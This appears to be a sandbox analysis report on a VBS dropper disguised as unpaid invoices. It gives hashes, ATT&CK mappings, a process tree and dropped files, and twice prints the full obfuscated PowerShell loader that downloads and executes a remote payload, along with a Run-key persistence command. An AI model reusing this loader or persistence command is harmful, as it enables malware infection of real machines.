236a755fd21fa7c19316ad4bf54494d3d700d3a10acfd201e0efae3f7c599ad9

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21/10/2024, 16:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs
Size

28KB
MD5

a8da570deac5f16a0050802c0da5d7dd
SHA1

9d8992e3770e41d8a431350e1cef73492dc240ea
SHA256

c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d
SHA512

7731d4d019eb8e3cfa5e2e5d5802e4033cf289134c15c3a237bcfd7559ab964265b82b825b65451a21703f441619081b9be46767923fb7f662aa12a86e997730
SSDEEP

384:XrCiU16HKM4O+pbHLipRBP1Mv4Uwz+3S0KLV5Zsk+PNngq:Xen6HspbH2xdoftaV5Ck4N7

Score

8^/10

discovery execution persistence

Malware Config

Signatures

Blocklisted process makes network request 64 IoCs

flow	pid	Process
4	3628	WScript.exe
8	4936	powershell.exe
31	4788	msiexec.exe
33	4788	msiexec.exe
36	4788	msiexec.exe
38	4788	msiexec.exe
45	4788	msiexec.exe
50	4788	msiexec.exe
54	4788	msiexec.exe
55	4788	msiexec.exe
56	4788	msiexec.exe
57	4788	msiexec.exe
58	4788	msiexec.exe
59	4788	msiexec.exe
60	4788	msiexec.exe
61	4788	msiexec.exe
62	4788	msiexec.exe
63	4788	msiexec.exe
64	4788	msiexec.exe
65	4788	msiexec.exe
66	4788	msiexec.exe
67	4788	msiexec.exe
68	4788	msiexec.exe
69	4788	msiexec.exe
70	4788	msiexec.exe
71	4788	msiexec.exe
74	4788	msiexec.exe
78	4788	msiexec.exe
79	4788	msiexec.exe
80	4788	msiexec.exe
83	4788	msiexec.exe
85	4788	msiexec.exe
86	4788	msiexec.exe
87	4788	msiexec.exe
88	4788	msiexec.exe
89	4788	msiexec.exe
90	4788	msiexec.exe
91	4788	msiexec.exe
92	4788	msiexec.exe
93	4788	msiexec.exe
94	4788	msiexec.exe
95	4788	msiexec.exe
96	4788	msiexec.exe
97	4788	msiexec.exe
99	4788	msiexec.exe
100	4788	msiexec.exe
103	4788	msiexec.exe
105	4788	msiexec.exe
106	4788	msiexec.exe
107	4788	msiexec.exe
108	4788	msiexec.exe
113	4788	msiexec.exe
120	4788	msiexec.exe
121	4788	msiexec.exe
122	4788	msiexec.exe
123	4788	msiexec.exe
124	4788	msiexec.exe
125	4788	msiexec.exe
126	4788	msiexec.exe
127	4788	msiexec.exe
128	4788	msiexec.exe
129	4788	msiexec.exe
130	4788	msiexec.exe
131	4788	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sandsynliggrelsens = "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\\Software\\Skulptureredes\\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4936	powershell.exe
4364	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4364	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3528	ping.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
760	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3528	ping.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4936	powershell.exe
4936	powershell.exe
4364	powershell.exe
4364	powershell.exe
4364	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4364	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	4364	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 3628 wrote to memory of 3528	3628	WScript.exe	85
PID 3628 wrote to memory of 3528	3628	WScript.exe	85
PID 3628 wrote to memory of 4936	3628	WScript.exe	89
PID 3628 wrote to memory of 4936	3628	WScript.exe	89
PID 4364 wrote to memory of 4788	4364	powershell.exe	103
PID 4364 wrote to memory of 4788	4364	powershell.exe	103
PID 4364 wrote to memory of 4788	4364	powershell.exe	103
PID 4364 wrote to memory of 4788	4364	powershell.exe	103
PID 1092 wrote to memory of 760	1092	cmd.exe	107
PID 1092 wrote to memory of 760	1092	cmd.exe	107
PID 1092 wrote to memory of 760	1092	cmd.exe	107

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3628
- C:\Windows\System32\ping.exe
  ping gormezl_6777.6777.6777.677e
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:3528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4364
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:4788
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
114c984765eb689044341de54b5a3aea

SHA1
9b5a91858d34447b8c9d2fc3d7f3d8590370bd63

SHA256
bc1a08e1240cc558ce236b397c93cd070420fadf35e76621ae833dab0a1462d0

SHA512
4c80de26024941a1d4295a5dd41ca15331fd02d32371a53391ed38ff736cc42c44d7e1b059dd17648a6e9fc35f5ab78cba2d5a3f86aaa9f0661ae8920cd0d332

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0f0ix20f.0im.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Clothesman.Vin

Filesize
475KB

MD5
87ff833a255506114faa969869e18546

SHA1
86316d90af91a20bffd5a586e7ae94befe65651d

SHA256
47a1ffa66a690b0adcf95f5a2141629e112ede25f80dda1adeb4f846f2d14beb

SHA512
6c484170c56d52f1f1786c8eb18ccbebb138c8a1f90b57c509c1e7d5a9fcf1bccecd4e0754df6836d9602651094c02c3c58d3c3d0d72b25451952a1dc8091509

Download Submit
memory/4364-40-0x0000000006730000-0x000000000677C000-memory.dmp

Filesize
304KB

Download
memory/4364-37-0x0000000006100000-0x0000000006454000-memory.dmp

Filesize
3.3MB

Download
memory/4364-47-0x0000000009170000-0x000000000C950000-memory.dmp

Filesize
55.9MB

Download
memory/4364-45-0x0000000008BC0000-0x0000000009164000-memory.dmp

Filesize
5.6MB

Download
memory/4364-23-0x0000000005150000-0x0000000005186000-memory.dmp

Filesize
216KB

Download
memory/4364-24-0x00000000057F0000-0x0000000005E18000-memory.dmp

Filesize
6.2MB

Download
memory/4364-25-0x0000000005730000-0x0000000005752000-memory.dmp

Filesize
136KB

Download
memory/4364-26-0x0000000005F20000-0x0000000005F86000-memory.dmp

Filesize
408KB

Download
memory/4364-27-0x0000000005F90000-0x0000000005FF6000-memory.dmp

Filesize
408KB

Download
memory/4364-44-0x0000000007910000-0x0000000007932000-memory.dmp

Filesize
136KB

Download
memory/4364-43-0x00000000079B0000-0x0000000007A46000-memory.dmp

Filesize
600KB

Download
memory/4364-39-0x0000000006710000-0x000000000672E000-memory.dmp

Filesize
120KB

Download
memory/4364-42-0x0000000006CC0000-0x0000000006CDA000-memory.dmp

Filesize
104KB

Download
memory/4364-41-0x0000000007F90000-0x000000000860A000-memory.dmp

Filesize
6.5MB

Download
memory/4936-4-0x00007FFC7F613000-0x00007FFC7F615000-memory.dmp

Filesize
8KB

Download
memory/4936-15-0x00007FFC7F610000-0x00007FFC800D1000-memory.dmp

Filesize
10.8MB

Download
memory/4936-16-0x00007FFC7F610000-0x00007FFC800D1000-memory.dmp

Filesize
10.8MB

Download
memory/4936-22-0x00007FFC7F610000-0x00007FFC800D1000-memory.dmp

Filesize
10.8MB

Download
memory/4936-14-0x0000013A6B250000-0x0000013A6B272000-memory.dmp

Filesize
136KB

Download
memory/4936-19-0x00007FFC7F610000-0x00007FFC800D1000-memory.dmp

Filesize
10.8MB

Download